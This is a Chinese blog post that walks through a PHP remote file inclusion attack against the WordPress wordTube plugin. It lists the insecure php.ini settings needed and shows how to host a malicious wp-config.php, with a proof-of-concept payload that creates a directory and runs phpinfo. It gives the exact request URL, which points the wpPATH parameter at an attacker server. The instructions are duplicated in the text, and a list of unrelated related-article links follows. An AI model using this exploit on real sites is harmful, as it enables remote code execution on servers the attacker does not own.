修改部分php配置实现 远程包含 攻击
2013-01-25 11:03
218 查看
1. 调试期间,可以打开display_errors = On
2. 目标机使用了include、require或require_once
3. 目标机配置
a) register_globals = On
b) allow_url_fopen = On
c) allow_url_include = On
这样的目标就可以进行攻击了
自己搭建简易的服务器,apache + php 即可
修改httpd.conf中,将后缀为php的,从而避免代码在攻击端就被执行,
#AddType application/x-httpd-php .php .html .htm
根据漏洞代码,生成对应的环境,例如:
if (!$_POST) $wppath=$_GET['wpPATH'];
else $wppath=$_POST['wpPATH'];
require_once($wppath.'/wp-config.php');
我们就可以建立一个可访问的文件夹bad_guy,
增加读权限order allow,deny allow from all ,
然后在里面新建一个wp-config.php
~然后请求一下就行了
/wordpress/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://10.67.1.30/bad_guy
来张效果图:
2. 目标机使用了include、require或require_once
3. 目标机配置
a) register_globals = On
b) allow_url_fopen = On
c) allow_url_include = On
这样的目标就可以进行攻击了
自己搭建简易的服务器,apache + php 即可
修改httpd.conf中,将后缀为php的,从而避免代码在攻击端就被执行,
#AddType application/x-httpd-php .php .html .htm
根据漏洞代码,生成对应的环境,例如:
if (!$_POST) $wppath=$_GET['wpPATH'];
else $wppath=$_POST['wpPATH'];
require_once($wppath.'/wp-config.php');
我们就可以建立一个可访问的文件夹bad_guy,
增加读权限order allow,deny allow from all ,
然后在里面新建一个wp-config.php
<?php mkdir('c:\exploit'); phpinfo(); exit; ?>
~然后请求一下就行了
/wordpress/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://10.67.1.30/bad_guy
来张效果图:
相关文章推荐
- php实现 修改配置文件的实例
- php实现动态修改配置文件
- 利用ini_set()函数实现对php配置文件的修改
- VB+PHP实现在线修改Windows服务器的配置文件
- 修改Win7的防火墙配置实现IIS 7远程访问
- php nginx配置的连接方式修改为sock的方式
- oracle远程连接快速配置,只需要修改一个
- ubuntu server配置mysql并实现远程连接的操作方法
- 配置openssh实现sftp远程文件上传
- php经典实例使用正则动态修改配置文件
- fswatch rsync配置使用 实现远程与本地同步
- PHP + ORACLE 远程连接数据库环境配置
- WebClient修改远程文件时:“远程服务器返回错误: (501) 未实现”的错误 分类: .NET 2012-11-17 16:01 3846人阅读 评论(0) 收藏
- 使用PHP对配置文件进行修改
- 不用复杂配置的超酷软件包-包含 MySQL、PHP 和 Perl 的 Apache 发行版
- 动态修改thinkphp公共配置文件config.php
- PHP 实现文件上传 php配置
- 修改config.php配置
- 使用PHP 版eclipse来配置远程DEBUG PHP代码
- VMWare虚拟机下CentOS 配置网络实现远程连接,提供Web访问